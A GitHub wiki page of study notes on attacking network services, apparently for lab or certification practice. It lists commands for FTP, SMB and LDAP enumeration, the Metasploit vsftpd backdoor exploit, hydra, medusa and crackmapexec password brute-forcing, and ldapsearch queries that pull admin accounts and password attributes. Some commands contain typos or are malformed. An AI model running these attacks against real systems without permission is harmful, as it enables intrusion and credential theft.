Services Hacking - singirikondamani/Noted GitHub Wiki

FTP Enumeration:

  • Start doing the nmap scan to the FTP port - nmap -sV -sC T4 -p 21 0.0.0.0
  • Identify the version of the FTP server and any critical information can be useful for further enumeration.
  • Strat the metasploit - Run msfconsole -q
  • search for the ftp exploit module search vsftpd
  • Use the module by use exploit/unix/ftp/vsftp_234_backdoor
  • Set the RHOST, RPORT and run the exploit

FTP Password Enumeration or Burt force:

  • Use hydra: hydra -L username.txt -P password.txt 0.0.0.0 ftp OR
  • Use medusa: medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp

FTP login or Access through

  • ftp 0.0.0.0 (if the Anonymous Authentication enable then able to login)
  • netcat 0.0.0.0 21
  • telnet 0.0.0.0 21
  • openssl s_client -connect 10.129.14.136:21 -starttls ftp

Download available files with anonymous:

wget -m --no-passive ftp://anonymous:[email protected]/

SMB Enumeration:

  • Start with nmap scan- sudo nmap 10.129.14.128 -sV -sC -p139,445
  • Check for null session - smbclient -N -L //<FQDN/IP>
  • Connect to specific shared file - smbclient //<FQDN/IP>/<share>
  • Interaction with the target using RPC- rpcclient -U "" <FQDN/IP>
  • Username enumeration using Impacket scripts- samrdump.py <FQDN/IP>
  • SMBMAP is used for enumerating SMB shares and permissions, not for cracking usernames or passwords- smbmap -H <FQDN/IP>
  • enum4linux-ng.py only gathers and enumerates information from the target system; it does not automatically interact with SMB in terms of performing any actions like writing, uploading, or modifying files - enum4linux-ng.py <FQDN/IP> -A
  • Burt Force the username or password
  1. crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' --local-auth
  2. hydra -L users.txt -P passwords.txt smb://192.168.1.10

To perform the LDAP enumeration on target network and find out number users associated with domain

Use the Tools : idapsearch

  1. Step: ldapsearch tool is default installed on the parrot OS
  2. Step: To identify the base Run→ Sudo su → ldapsearch -h
  3. Get All Information from the Directory: (Version also available in same output) → ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(objectClass=*)"
  4. List the users: ldapsearch etc/openldap/ldap.config
  5. Get the list of users:run ldapsearch -h → ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,D=COM" "objectclass=Users"
  6. Get Details of a Specific User:ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)"
  7. Retrieve Specific Attributes for a User:ldapsearch -x -h 0.0.0.0 -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)" cn mail memberOf
  8. **Retrieve Administrative Accounts:**→ ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(memberOf=CN=Domain Admins,CN=Users,DC=CEHORG,DC=COM)"
  9. List All Users and Their Password Attributes:ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(objectClass=user)" sAMAccountName userPassword
  10. **Retrieve User Passwords (If Available)**→ ldapsearch -x -h <ldap_server> -b "DC=CEHORG,DC=COM" "(sAMAccountName=johndoe)" userPassword

Remaining things: aLL SERVICE ENUM

⚠️ **GitHub.com Fallback** ⚠️